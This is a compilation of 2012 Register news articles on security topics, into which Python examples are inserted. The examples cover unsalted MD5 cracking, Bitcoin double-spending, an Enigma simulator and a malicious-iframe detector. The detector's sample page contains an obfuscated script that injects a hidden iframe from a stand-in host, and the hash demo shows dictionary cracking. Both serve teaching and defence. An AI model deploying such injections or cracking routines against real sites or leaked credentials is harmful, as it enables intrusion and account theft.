STE WILLIAMS

Beware Instagram PERIL HOTTIES, say security bods

Scammers are targeting Instagram users by creating fake profiles to gather personal details before attempting to trick users into signing up for premium-rate mobile services, among other ruses.

Fake profiles on the social network often feature “women” with attractive profile pictures who have never posted any photos. Their profile bios include a quote, followed by a shortened URL. These links almost invariably point to advertisements for fake jobs working in social media.

Mobile messages spammed by these fake profiles point to premium mobile service sign-ups of dubious utility, such as videos of cute animals for only €4.50 per month.

The fake profiles are part of a wider pattern of scams on Instagram, according to Symantec.

“The scams take on a number of forms, from spam comments, to fake followers, to liking photos in the hopes people will check out their profiles, which in turn often contain more spam links,” Paul Wood, a security researcher at Symantec, explains in a blog post.

Instagram’s photo-sharing and social network services were acquired by Facebook in a cash and stock deal valued at about $715m when it closed in September. The growing popularity of the photo-sharing social network, which boasts more than 100m members, means it is becoming the target of the fake-profile scams that have bedevilled Facebook and Twitter for some time.

The latest monthly edition of Symantec’s internet threat report also records a significant drop in spam volumes during October, with the global spam rate falling by more than 10 percentage points, from 75 per cent of email traffic in September to 64.8 per cent in October. The (likely temporary) respite may be down to a decline in one prominent spam-spewing zombie network.

“It appears that the Festi botnet has recently gone quiet and could be partly responsible for this sudden decline. This botnet was very active in early September before all but disappearing in October,” according to Symantec’s study (PDF).

Security researchers at the security giant caution that spam volumes might easily increase towards the holiday season as other zombie networks pick up the slack.

“Unfortunately, we’ve seen drops like this before, where other botnets soon jump in to pick up the slack, or a “dead” botnet is reincarnated in a slightly different manifestation. For example, the Kelihos botnet is now believed to be in at least its third incarnation since Microsoft targeted the botnet in the company’s efforts to disrupt the botnet over 12 months ago.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/instagram_scams_up_spam_down/

Adobe Connect breach pops lid off ‘Letmein’ logins of gov, army types

A breach of Adobe’s Connectusers.com forum database has once again exposed password security foibles, as well as website security shortcomings on Adobe’s part.

Adobe suspended the forum on Tuesday night in response to the hack, as previously reported. The software developer stressed in a statement that its Adobe Connect web conferencing service itself was not affected by the breach.

An Egyptian hacker named “ViruS_HimA” has stepped forward to claim he hacked into “one of Adobe’s servers” before extracting a database containing email addresses, password hashes and other information of over 150,000 Adobe customers, partners and employees.

ViruS_HimA published a limited set of records for users with email addresses ending in adobe.com, .mil and .gov as a means to substantiate his claims on Pastebin.

A statement from Adobe spokeswoman Wiebke Lips appears to back up this claim. Lips said: “The forum has a total of about 150,000 registered users. The attacker leaked 644 records.”

She added: “We reset the passwords of all Connectusers.com forum members and are reaching out to those members with instructions on how to set up new passwords once the forum services are restored.”

In the Pastebin leak post, which has since been pulled, ViruS_HimA said he had targeted Adobe because of shortcomings in its handling of security reports. He promised a leak against Yahoo! would follow.

Analysis of the leak sample by Paul Ducklin, head of technology, Asia Pacific at Sophos, shows that Adobe stored the passwords as plain MD5 digests. MD5 is a fast general-purpose hash function, long known to be cryptographically weak and in any case unsuited to password storage, where a deliberately slow function is wanted. Adobe also failed to salt the hashes. A per-user random salt defeats precomputed lookups such as rainbow tables (built once from dictionaries of plaintext passwords and reused against every unsalted dump), forces an attacker to crack each hash separately rather than all 150,000 at once, and stops identical passwords producing identical hashes.

Ducklin reports that some of the 644 leaked password hashes corresponded to lame passwords such as “Letmein”, “123456” and “welcome”, each of which appears more than once on the list. Passwords like breeze and connect (Adobe product names) appear four times each, he adds.

Tal Be’ery, a security researcher at Imperva, said an examination of the leak data suggested it came from a valid but old database.

“We compared some names in the leaked files against Linkedin.com and found out that the names in the file were people who had worked for Adobe but were no longer employed there. This suggests that this list is valid [but] the hacked database is probably pretty old.” Password hashes were not salted to guard against brute force cracking attacks, Be’ery adds.

“Based on an analysis of the leaked data, the password hashes – encrypted versions of the passwords – stored in the compromised Adobe database had been generated with MD5, a cryptographic hash function that’s known to be insecure. This means that they can easily be cracked to recover the original passwords,” he concludes. ®
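The effect of an unsalted fast hash, as an added example in Python that is not part of the article or of the Sophos and Imperva analyses it quotes. The wordlist and the list of user passwords below are constructed for the example (they are not the leaked data), and the stand-in “dump” is built from them, so no real hashes are involved:

```python
import hashlib
import os
from typing import Dict, List, Optional

# Constructed wordlist: the weak choices the article names, plus a few more.
WORDLIST = ["Letmein", "123456", "welcome", "breeze", "connect",
            "password", "qwerty", "adobe"]

# Constructed stand-in for the leak: our own made-up users, four of whom chose
# "breeze", plus one strong password the dictionary will not contain.
USER_PASSWORDS = ["Letmein", "breeze", "breeze", "123456", "breeze",
                  "welcome", "breeze", "Tr0ub4dor&3-unlisted"]


def unsalted_md5(password: str) -> str:
    """How the forum database stored passwords: bare MD5 of the password."""
    return hashlib.md5(password.encode()).hexdigest()


def salted_md5(password: str, salt: bytes) -> str:
    """Same weak hash with a per-user random salt, stored as salt$digest.
    A slow password hash (bcrypt, scrypt) is the real fix; this isolates
    what the salt alone buys."""
    digest = hashlib.md5(salt + password.encode()).hexdigest()
    return f"{salt.hex()}${digest}"


def precompute(words: List[str]) -> Dict[str, str]:
    """digest -> plaintext, built once and reused against every unsalted dump.
    A rainbow table is a space-optimised form of exactly this table."""
    return {unsalted_md5(w): w for w in words}


def crack_unsalted(dump: List[str], table: Dict[str, str]) -> Dict[str, Optional[str]]:
    """One dictionary lookup per leaked hash, whatever the size of the dump."""
    return {h: table.get(h) for h in dump}


def crack_salted(dump: List[str], words: List[str]) -> Dict[str, Optional[str]]:
    """The precomputed table is useless: each record needs its own pass over
    the wordlist, so the work grows with the number of users."""
    results: Dict[str, Optional[str]] = {}
    for record in dump:
        salt_hex, digest = record.split("$")
        salt = bytes.fromhex(salt_hex)
        results[record] = next(
            (w for w in words
             if hashlib.md5(salt + w.encode()).hexdigest() == digest),
            None)
    return results


def shared_passwords(dump: List[str]) -> Dict[str, int]:
    """Without a salt, equal passwords give equal digests, so a dump reveals
    which users chose the same password before any cracking is done."""
    counts: Dict[str, int] = {}
    for h in dump:
        counts[h] = counts.get(h, 0) + 1
    return {h: n for h, n in counts.items() if n > 1}


def demo() -> Dict[str, object]:
    unsalted_dump = [unsalted_md5(p) for p in USER_PASSWORDS]
    salted_dump = [salted_md5(p, os.urandom(8)) for p in USER_PASSWORDS]
    table = precompute(WORDLIST)
    return {
        "unsalted_cracked": crack_unsalted(unsalted_dump, table),
        "unsalted_shared": shared_passwords(unsalted_dump),
        "salted_cracked": crack_salted(salted_dump, WORDLIST),
        "salted_shared": shared_passwords(salted_dump),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Run it and the unsalted dump gives up every dictionary password with a single table lookup each and shows “breeze” four times before any cracking starts; the salted dump yields the same weak passwords, but only after a full wordlist pass per user, and shows no repeats.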

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/adobe_forum_breach/

Avira antivirus patched but still not fully Windows 8 ready

Avira has rolled out a patch that makes its popular freebie anti-virus software more compatible with Windows 8.

Earlier this month the German firm admitted its products were not yet compatible with Windows 8 after users complained that attempting to run Avira’s software on Microsoft’s latest operating system results in the infamous Blue Screen of Death.

Avira said its security technology didn’t play well with Windows Server 2012 because of a radical redesign in Microsoft’s underlying operating system technology.

Travis Witteveen, chief operating officer of Avira, told El Reg that Avira hoped to have compatible products within weeks. He admitted that it was possible that Avira would lose market share to freebie anti-virus competitors, such as AVG, in the meantime.

Software patches released by Avira on Tuesday ought to resolve the BSOD (stability) problems but users might still be confronted with a pop-up that warns that the software is not officially supported by the security firm. Sorin Mustaca, product manager at Avira, said that the security firm plans to release further software updates to iron out remaining problems. “We are working very hard to get our products Windows 8 compatible as soon as possible,” he said.

A blog post by Mustaca goes some way to explaining why achieving compatibility between security products and Windows 8 is a challenge, without providing much insight into why the German firm didn’t see this problem coming months ago. There have been three preview/beta builds of Windows 8 since September 2011, but Avira’s failure to get products ready in time suggests it didn’t put enough resources into developing and testing its technology against the operating system until much too late.

“The Windows 8 operating system, and its equivalent in the server area called Windows Server 2012, have a completely new architecture,” Mustaca explains. “Their architecture forces the software which runs on them to make significant changes in the frameworks and the APIs (Application Programming Interface) used to write the software. Old frameworks (e.g., Layered Service Providers, Transport Driver Interface, etc) will no longer be supported in the long term.

“As with any new computer operating system, it is possible that at the beginning some existing software is not compatible with it. Currently, the Avira products are not yet certified for Windows 8 and Windows Server 2012 and there were some problems reported by our users who have upgraded to this operating system.”

Independent testing lab AV-Test.org reports that the vast majority of anti-virus vendors in the market already offer Windows 8-compatible products to consumers. But Reg reader feedback from our previous story on Avira’s Win 8 woes suggests that it’s not always plain sailing even with products listed as compatible with Windows 8. Nonetheless the absence of Avira from the list remains noticeable. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/avira_patches_win8_crash/

WordPress to accept Bitcoin without confirmations

Automattic, the company behind blogging platform WordPress.com, has decided it will accept payment for some services through Bitcoin, the controversial open source currency.

WordPress is proudly free, but Automattic offers some paid services like custom design. Those services, code wrangler Andy Skelton says in a blog post, aren’t available to everyone because of “limits on traditional payment networks” such as the fact that “PayPal alone blocks access from over 60 countries, and many credit card companies have similar restrictions.”

“Whatever the reason, we don’t think an individual blogger from Haiti, Ethiopia, or Kenya should have diminished access to the blogosphere because of payment issues they can’t control,” Skelton adds.

Bitpay.com is Automattic’s bit bank of choice.

Intriguingly, the company will offer Bitcoin payments without waiting for ‘confirmations’. A transaction is confirmed once a block that includes it has been mined; each further block built on top counts as another confirmation. Until that first block arrives the transaction has merely been relayed between nodes, and a conflicting transaction spending the same coins could still be mined in its place, which is why many services insist on multiple confirmations before treating a payment as final. As Skelton’s post notes, that takes time (blocks arrive roughly every ten minutes) and makes for a less-than-satisfying experience.

“Making you wait for confirmations would virtually eliminate our risk,” Skelton writes, “but we’re confident that with digital products like ours the risk is already acceptably low.” That’s presumably because if a transaction goes sour, Automattic can simply tick the box to withdraw the upgrade that it has been ‘paid’ for.
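A toy model of what a zero-confirmation merchant is accepting, added here as an example; it is not Automattic’s or BitPay’s code and the article describes no such code. Transaction and coin names are made up, and the chain has no proof-of-work, fees or reorganisations, just a mempool of relayed transactions and a list of mined blocks:

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass(frozen=True)
class Tx:
    txid: str
    spends: str    # the coin (unspent output) this transaction consumes
    pays_to: str


@dataclass
class Block:
    txs: List[Tx]


class ToyChain:
    """Just enough of Bitcoin to count confirmations: relayed transactions
    sit in a mempool with zero confirmations, a mined block gives them one,
    and every block built on top adds another."""

    def __init__(self) -> None:
        self.mempool: List[Tx] = []
        self.blocks: List[Block] = []

    def relay(self, tx: Tx) -> None:
        """A node hears about tx from its peers. This is all a
        zero-confirmation merchant ever sees before delivering."""
        self.mempool.append(tx)

    def _spent_on_chain(self) -> Set[str]:
        return {t.spends for b in self.blocks for t in b.txs}

    def mine(self, preferred: Optional[List[Tx]] = None) -> Block:
        """The miner chooses what to include. A coin can be spent once on
        chain, so whichever of two conflicting transactions is mined wins
        and the loser is dropped from every honest mempool."""
        spent = self._spent_on_chain()
        included: List[Tx] = []
        for tx in (preferred if preferred is not None else list(self.mempool)):
            if tx.spends not in spent:
                included.append(tx)
                spent.add(tx.spends)
        block = Block(included)
        self.blocks.append(block)
        self.mempool = [t for t in self.mempool if t.spends not in spent]
        return block

    def confirmations(self, txid: str) -> int:
        for height, block in enumerate(self.blocks):
            if any(t.txid == txid for t in block.txs):
                return len(self.blocks) - height
        return 0

    def seen(self, txid: str) -> bool:
        """Relayed or mined: the most a zero-confirmation check can verify."""
        return (any(t.txid == txid for t in self.mempool)
                or self.confirmations(txid) > 0)


def merchant_accepts(chain: ToyChain, txid: str, required: int) -> bool:
    """Automattic's policy is required=0; many services use 3 or 6."""
    return chain.seen(txid) and chain.confirmations(txid) >= required


def double_spend_demo() -> Dict[str, object]:
    """Buyer pays the merchant, then gets a conflicting payment to itself
    mined first. The merchant that waited for no confirmations has already
    delivered; the one that waited for even one has not."""
    chain = ToyChain()
    pay_merchant = Tx("tx-merchant", spends="coin-1", pays_to="merchant")
    pay_self = Tx("tx-attacker", spends="coin-1", pays_to="attacker")
    chain.relay(pay_merchant)
    accepted_at_0 = merchant_accepts(chain, "tx-merchant", 0)
    accepted_at_1 = merchant_accepts(chain, "tx-merchant", 1)
    chain.relay(pay_self)
    chain.mine([pay_self])          # a cooperating miner includes the conflict
    for _ in range(2):              # the chain moves on without tx-merchant
        chain.mine()
    return {
        "accepted_at_0": accepted_at_0,
        "accepted_at_1": accepted_at_1,
        "merchant_confirmations": chain.confirmations("tx-merchant"),
        "attacker_confirmations": chain.confirmations("tx-attacker"),
        "merchant_tx_still_pending": chain.seen("tx-merchant"),
    }


if __name__ == "__main__":
    print(double_spend_demo())
```

The model makes Skelton’s trade-off concrete: the zero-confirmation check passes the moment the payment is relayed, and the only thing that later tells the merchant the payment evaporated is that the transaction never gains a confirmation. For a revocable digital upgrade that is tolerable; for goods that leave the building it is not.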

Automattic will also work around another Bitcoin characteristic: transactions are irreversible, so there is no chargeback mechanism and a refund has to be a fresh payment in the other direction.

“If a refund is granted on a purchase made with BTC we will work with BitPay to issue a refund in BTC,” Skelton writes. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/wordpress_to_accept_bitcoin/

Ancient vulnerability sparks world-wide hypegasm

A class of attack against radio networks documented as far back as the year 2000 has pulled worldwide headlines by being highlighted in a submission to the US government.

The submission, here, has gained notoriety all over the world, starting with Technology Review which headlined it “One simple trick could disable a city’s 4G phone network”.

The paper, submitted to an inquiry into the use of LTE in public safety networks, outlines denial-of-service attacks. These include a technique that sends fake synchronisation signals to handsets within range (so that they cannot acquire and attach to the base station), and one that sends signals to the base station which make it assign radio resources to the jammer rather than to “real” users.

The paper describes the Virginia Tech work, headed by Dr Jeffrey Reed, as a “work in progress”, but the idea that an entire city’s network could be disabled by a suitcase-sized jammer is, in these paranoid days, too good to resist.

Since it didn’t seem feasible that the submission existed without reference to previous research, The Register decided to seek out the background.

One thing becomes clear, very rapidly: if carriers, vendors and standards-setters are not aware of the feasibility of synchronisation attacks, they’ve been asleep at the wheel since at least the year 2000, when this paper was published. Authored by Mika Ståhlberg of Helsinki University of Technology, it focuses on the radio standards of the day, such as GSM, noting: “Jamming can be concentrated on the synchronization signal, cutting effectively the entire transmission.”

Virginia Tech’s prior publications – which probably form the basis of the submission, at least in part – include “Physical Layer Security Challenges of DSA-Enabled TD-LTE” here, and from earlier this year, “Efficient Jamming Attacks on MIMO Channels”, here and “Performance of Pilot Jamming on MIMO Channels with Imperfect Synchronization”, here.

The last two were presentations at the IEEE’s ICC 2012 conference, but seem to have escaped everybody’s notice at the time. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/tech_review_sucker_punches_lazypress/

Anonymous attacks Israeli websites over Gaza bombings

Hackers operating for Anonymous have been launching DDoS attacks and defacing websites to demonstrate their displeasure at Israel’s recent military action in the Gaza Strip, which is currently in its second day.

According to its Twitter feed, the group claims to have taken down or defaced over 40 government and military websites in three hours on Thursday morning, and it has warned of more attacks to come in what it’s calling #OpIsrael. The group said it had been provoked by Israel’s “insane attack” and by threats that the army would cut off internet communications with Gaza.

“When the government of Israel publicly threatened to sever all internet and other telecommunications into and out of Gaza they crossed a line in the sand,” the group said on Twitter. “As the former dictator of Egypt Mubarak learned the hard way – we are ANONYMOUS and NO ONE shuts down the Internet on our watch.”

So far the Israeli Defense Forces (IDF) don’t exactly seem to be quaking in their boots but some minor sites have been defaced with messages supporting the Palestinians. The hackers also issued a copy of the traditional video threat:

The group also released information packs in English and Arabic containing tips and contacts for the residents of Gaza to use in the event of communications going down. So far there has been no official word of any Israeli internet blockade plans, however, and the website for the Palestinian Telecommunication Group is still working as The Reg goes to press.

These kinds of Anonymous operations usually last a few days and then fade away, but this time the hackers and DDoS attackers may have bitten off more than they can chew. The IDF is probably the best in the business when it comes to online security (behind the NSA) and if this is the usual script kiddies using duff tools, they could find themselves fingered very quickly. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/16/anonymous_attacks_israel/

Nazi Enigma encoding machine sells in London for over £80k

A rare German WWII Enigma cipher machine has beaten its auction estimate in London, selling for £85,250.

Bonhams auctioneers had put a £40,000 to £60,000 estimate on the pristine 1941 oak model coding device, used by the Nazis to encrypt and decode messages sent between the military and their commanders.

“Enigma machines come up very rarely at auction. This particular example is in working order, completely untouched and unrestored,” Laurence Fisher, specialist head of mechanical music, technical apparatus and scientific instruments, said before the auction.

“Many machines were picked up by the Allies as souvenirs during the final stages of the second World War and as such, in later years, tended to be ‘mixed and matched’, where rotors, outer cases and head blocks were replaced with other machines’ parts.

“This one has all elements bearing the same serial number, making this totally complete and original throughout.”

The version of the machine sold was a model used between 1938 and 1944. Its three rotors, each with 26 settings, give 26 × 26 × 26 = 17,576 possible starting positions, before rotor order, ring settings and the plugboard are counted; the rotors step with every keypress, so each letter of a message is enciphered with a different substitution. Enigma traffic was first broken by Polish cryptologists in the 1930s; Bletchley Park’s bombe, designed by Alan Turing and refined by Gordon Welchman, mechanised the daily search for the rotor settings. ®
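An added example, not part of the article, of the three-rotor machine in Python: a simulator of the Wehrmacht Enigma I using the historical wirings of rotors I to III and reflector B, plus the key-space arithmetic behind the 17,576 figure. It demonstrates the property the codebreakers leaned on: because the reflector makes every substitution reciprocal, the same settings decipher what they enciphered, and no letter ever enciphers to itself, which lets a guessed piece of plaintext (a crib) be slid along a ciphertext until it fits.

```python
from math import factorial
from typing import Dict, List, Tuple

ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

# Historical wirings (entry contact -> exit contact) and turnover notches of
# Wehrmacht Enigma I rotors I-III, and the wiring of reflector B.
ROTORS: Dict[str, Tuple[str, str]] = {
    "I":   ("EKMFLGDQVZNTOWYHXUSPAIBRCJ", "Q"),
    "II":  ("AJDKSIRUXBLHWTMCQGZNPYFVOE", "E"),
    "III": ("BDFHJLCPRTXVZNYEIWGAKMUSQO", "V"),
}
REFLECTOR_B = "YRUHQSLDPXNGOKMIEBFZCWVJAT"


class Rotor:
    def __init__(self, name: str, ring: str, position: str) -> None:
        wiring, notch = ROTORS[name]
        self.fwd: List[int] = [ALPHA.index(c) for c in wiring]
        self.bwd: List[int] = [self.fwd.index(i) for i in range(26)]
        self.notch = ALPHA.index(notch)
        self.ring = ALPHA.index(ring)      # Ringstellung: wiring offset vs. the letter ring
        self.pos = ALPHA.index(position)   # the letter showing in the window

    def at_notch(self) -> bool:
        return self.pos == self.notch

    def step(self) -> None:
        self.pos = (self.pos + 1) % 26

    def _pass(self, c: int, table: List[int]) -> int:
        # Move the fixed contact into the rotor's frame, map it, move it back.
        shifted = (c + self.pos - self.ring) % 26
        return (table[shifted] - self.pos + self.ring) % 26

    def forward(self, c: int) -> int:
        return self._pass(c, self.fwd)

    def backward(self, c: int) -> int:
        return self._pass(c, self.bwd)


class Enigma:
    def __init__(self, rotors=("I", "II", "III"), rings="AAA",
                 positions="AAA", plugboard="") -> None:
        # Rotor order is given left to right, as fitted in the machine.
        self.left, self.middle, self.right = (
            Rotor(n, r, p) for n, r, p in zip(rotors, rings, positions))
        self.reflector = [ALPHA.index(c) for c in REFLECTOR_B]
        self.plug = list(range(26))
        for pair in plugboard.split():       # "AB CD" swaps A<->B and C<->D
            a, b = ALPHA.index(pair[0]), ALPHA.index(pair[1])
            self.plug[a], self.plug[b] = b, a

    def _step(self) -> None:
        # Rotors move before the circuit closes. The middle rotor's own notch
        # makes it step together with the left rotor (the "double step").
        if self.middle.at_notch():
            self.left.step()
            self.middle.step()
        elif self.right.at_notch():
            self.middle.step()
        self.right.step()

    def press(self, letter: str) -> str:
        self._step()
        c = self.plug[ALPHA.index(letter)]
        for rotor in (self.right, self.middle, self.left):
            c = rotor.forward(c)
        c = self.reflector[c]
        for rotor in (self.left, self.middle, self.right):
            c = rotor.backward(c)
        return ALPHA[self.plug[c]]

    def encrypt(self, text: str) -> str:
        # The same operation deciphers, given identical settings.
        return "".join(self.press(ch) for ch in text.upper() if ch in ALPHA)


def never_maps_to_itself(presses: int = 2000, **settings) -> bool:
    """Reflector reciprocity makes each step's substitution a set of swaps,
    so a letter can never encipher to itself. Crib attacks rely on that."""
    machine = Enigma(**settings)
    return all(machine.press(ALPHA[i % 26]) != ALPHA[i % 26] for i in range(presses))


def key_space(plug_pairs: int = 10) -> Dict[str, int]:
    """Where the auction house's 17,576 comes from, and what it leaves out."""
    positions = 26 ** 3                    # three rotors, 26 settings each
    orders = factorial(3)                  # which rotor sits in which slot
    plugboard = factorial(26) // (factorial(26 - 2 * plug_pairs)
                                  * factorial(plug_pairs) * 2 ** plug_pairs)
    return {"positions": positions, "rotor_orders": orders,
            "plugboard": plugboard, "total": positions * orders * plugboard}


if __name__ == "__main__":
    print(Enigma().encrypt("AAAAA"))   # the usual sanity check: BDZGO
    print(key_space())
```

With rotors I, II, III, reflector B and everything at A, five presses of A give BDZGO, the standard check for a correct simulator. The key-space figures show why the 17,576 starting positions were never the real obstacle: the plugboard alone contributes about 1.5 × 10^14 settings, while the rotor behaviour the bombe exploited was independent of the plugboard.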

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/15/enigma_machine_auction_price/

‘Spend police USB stick data loss mega-fine on IT lessons for cops’

A six-figure fine levelled against police for losing a USB stick of drug probe suspects’ details should be spent on training cops to take better care of sensitive data. That’s the view of a candidate standing in today’s police commissioner election in Greater Manchester.

Last month the county’s police force was fined £120,000 after the unencrypted drive was nicked from an officer’s home. The device contained information on more than 1,000 people linked to serious crime. The money has been paid by Greater Manchester Police (GMP) to the Treasury.

Matt Gallagher, a Liberal Democrat candidate for the Police and Crime Commissioner for Greater Manchester, wants the cash reimbursed to allow GMP to spend it on ISO27001 accreditation, training and security products. Gallagher also wants reassurances from top cops that there is no danger of data falling into the wrong hands.

“I would also appeal to the Information Commissioner to use his discretion and require GMP to invest some of this massive fine in assisting the force to provide security training and technical measures to ensure this incident isn’t repeated, including ISO27001 information security compliance and endpoint control,” he said.

“This is public money, it should be used as usefully as possible.”

Gallagher, a former police inspector, is standing against Tony Lloyd, a former Labour Party MP, and three other candidates: Conservative Michael Winstanley, Steven Woolfe of the UK Independence Party and Roy Warren, an independent.

Elections for US-style police commissioners are taking place across England and Wales today. There are widespread concerns about low voter turnout and criticism of the election process: political hacks with large central party campaign machines are canvassing against independent candidates.

The role will replace the police authority panels – historically made up of elected councillors – currently in charge of 41 forces in England and Wales. The Mayor of London is already tasked with a similar overseeing role in London, so elections will not take place in the capital. ®

Bootnote

Thanks to Reg reader Dave Page for the tipoff.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/15/invest_data_breach_fine_gmp_security_training/

Opera site served Blackhole malvertising, says antivirus firm

Opera has suspended ad-serving on its portal as a precaution while it investigates reports that surfers were being exposed to malware simply by visiting the Norwegian browser firm’s home page.

Malicious scripts loaded by portal.opera.com were redirecting users towards a malicious site hosting the notorious BlackHole exploit kit, said Romanian anti-virus firm BitDefender, which said it had detected the apparent attack with its automated systems. BitDefender said it promptly warned Opera after it detected the problem on Wednesday. It seems likely the scripts had been loaded through a third-party advertisement, a practice commonly known as malvertising.

Opera has yet to confirm the problem, but has disabled advertising scripts on its portal in case they are tainted. The browser firm says:

We are investigating the claim, and while we are working with this, we have taken some precautionary measures just to be safe, such as disabling the ads temporarily on portal.opera.com. We disabled ads yesterday [Wednesday], right after becoming aware of the claim, as a standard precaution and the ads had been disabled for several hours when Bitdefender issued a press release.

A blog post by BitDefender claimed that cybercrooks were using obfuscated script to hide the attack. The security firm said Opera fans had been exposed to attack simply by firing up the popular alternative browser software.

“The hidden and obfuscated piece of code in the Opera Portal homepage inserts an iFrame that loads malicious content from an external source,” BitDefender explains. “If the Opera user hasn’t changed their default homepage, active malicious content is loaded from a third-party website whenever they open their browser.”

In controlled tests, BitDefender researchers were served with a PDF-based exploit designed to infect an unlucky user with a freshly compiled variant of the infamous ZBot (ZeuS) banking Trojan. The exploit was served up from a (likely compromised) server in Russia, according to BitDefender. It’s unclear how many people might have been exposed to this drive-by-download-style attack from Opera’s portal, much less how many surfers might have been infected.
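A small detector for the kind of injection BitDefender describes, added here as an example; it is not BitDefender’s or Opera’s code and the article publishes no such code. The sample page, the hostnames (example.com standing in for the site, example.invalid for the payload host) and the obfuscation style (a percent-encoded iframe written into the page by document.write) are constructed for the example, not taken from the Opera incident:

```python
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import unquote, urlparse


class _Collector(HTMLParser):
    """Collects <iframe> attributes and the full text of each <script> block."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []
        self.scripts: List[str] = []
        self._buf: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script, self._buf = True, []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def deobfuscate(script: str) -> str:
    """Undo two cheap hiding tricks: unescape('%3C...') percent-encoding and
    String.fromCharCode(60,105,...) lists. Real kits layer more on top; this
    shows the principle of decoding before you pattern-match."""
    text = unquote(script)

    def from_char_code(match):
        return "".join(chr(int(n)) for n in re.findall(r"\d+", match.group(1)))

    return re.sub(r"String\.fromCharCode\(([^)]*)\)", from_char_code, text)


def base_domain(host: str) -> str:
    # Simplistic: last two labels. Fine for the demo, wrong for .co.uk-style suffixes.
    return ".".join(host.lower().split(".")[-2:])


def hidden(attrs: Dict[str, str]) -> bool:
    """Zero-size, display:none, visibility:hidden or parked far off-screen."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = lambda v: v.strip().lower().rstrip("px") in ("0", "1")
    return (tiny(attrs.get("width", "")) or tiny(attrs.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style
            or re.search(r"(left|top):-\d{3,}", style) is not None)


def scan(page_html: str, page_host: str) -> List[Dict[str, object]]:
    """Flag iframes that are hidden, point off-site, or only exist after a
    script is decoded (i.e. are written into the DOM at load time)."""
    top = _Collector()
    top.feed(page_html)
    candidates = [(f, False) for f in top.iframes]
    for script in top.scripts:
        decoded = deobfuscate(script)
        if "<iframe" in decoded.lower():
            inner = _Collector()
            inner.feed(decoded)
            candidates += [(f, True) for f in inner.iframes]
    findings: List[Dict[str, object]] = []
    for attrs, from_script in candidates:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host
        reasons = []
        if hidden(attrs):
            reasons.append("hidden")
        if base_domain(host) != base_domain(page_host):
            reasons.append("offsite")
        if from_script:
            reasons.append("script-written")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


# Constructed page: one legitimate, visible, same-site iframe and one injected
# script that writes a zero-size off-site iframe after percent-decoding.
SAMPLE_PAGE = """<html><body>
<iframe src="http://example.com/weather" width="300" height="120"></iframe>
<script type="text/javascript">
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fx.php%22%20width%3D%220%22%20height%3D%220%22%3E%3C%2Fiframe%3E'));
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_PAGE, "example.com"):
        print(finding)
```

Against the sample the visible weather iframe passes and the decoded one is reported on all three counts. In practice the decoding step matters more than the iframe heuristics: a signature that looks for `<iframe` in the raw HTML sees nothing, which is the whole point of the obfuscation BitDefender describes.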

“We have no indications that anyone was infected before or after we disabled the ads yesterday [Wednesday],” an Opera spokesman told El Reg.

“Malvertising” incidents are far from rare. Previous victims have included Spotify, the London Stock Exchange, The Pirate Bay, ITV.com and Major League Baseball, among many others. Diagnosing and resolving tainted ad problems tends to be far trickier than cases where a web server itself is running malicious script, so Opera is wise to suspend ad-serving while it looks into the potential problem. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/15/opera_blackhole/

Belize PM: McAfee boss is ‘bonkers’, should ‘man up and talk to cops’

Belize Prime Minister Dean Barrow has called the founder of McAfee antivirus software “bonkers” and “extremely paranoid”, wading into the discussion over the internet guru’s decision to first hide in the sand and then go on the run from the police in the Central American country.

“I don’t want to be unkind,” said the PM in remarks reported by Reuters, “but he seems extremely paranoid – I would go so far as to say bonkers. He ought to man up and respect our laws and go in and talk to the police.”

Belizean police have been trying to question John McAfee after his neighbour Gregory Faull, 52, a fellow American expat, was found dead from a gunshot wound to the back of his head. A recent report says that the police are not considering him a suspect.

After hearing the police arrive, McAfee’s first course of action was to hide in a cardboard box in the sand, something he described as “extremely uncomfortable” but considered necessary because he feared the police would try to kill or torture him. He is currently still on the run, though he has been giving interviews to Wired magazine describing how he has been hiding in boats and taxis and sleeping in lice-infested beds. McAfee also described how he had dyed his hair, eyebrows and moustache black:

“I have modified my appearance in a radical fashion,” McAfee told the mag. “I’ll probably look like a murderer, unfortunately.”

John McAfee mentioned the Belizean prime minister’s personal dislike of him as one of his motives for going on the run from the police, adding that Belizean police were out to get him: “They’ve been trying to get me for months. They want to silence me. I am not well liked by the prime minister.”

PM Barrow says that this is “nonsense” and that he has never met the cybersecurity guru. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/15/john_mcafee_belize_pm/